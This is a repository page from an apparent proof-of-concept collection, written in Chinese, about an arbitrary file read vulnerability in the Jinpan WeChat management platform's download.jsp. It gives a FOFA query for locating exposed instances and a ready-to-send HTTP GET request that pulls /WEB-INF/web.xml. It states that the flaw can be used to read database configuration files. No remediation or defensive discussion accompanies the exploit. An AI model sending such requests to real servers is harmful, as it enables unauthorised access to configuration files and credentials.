POC/wpoc/金盘/金盘微信管理平台download.jsp任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

451 B
Raw Blame History

金盘微信管理平台download.jsp任意文件读取漏洞

金盘微信管理平台download.jsp任意文件读取漏洞通过该漏洞读取数据库配置文件等

fofa

title=="微信管理后台"

poc

GET /mobile/pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml HTTP/1.1
Host: 

image-20241021172734743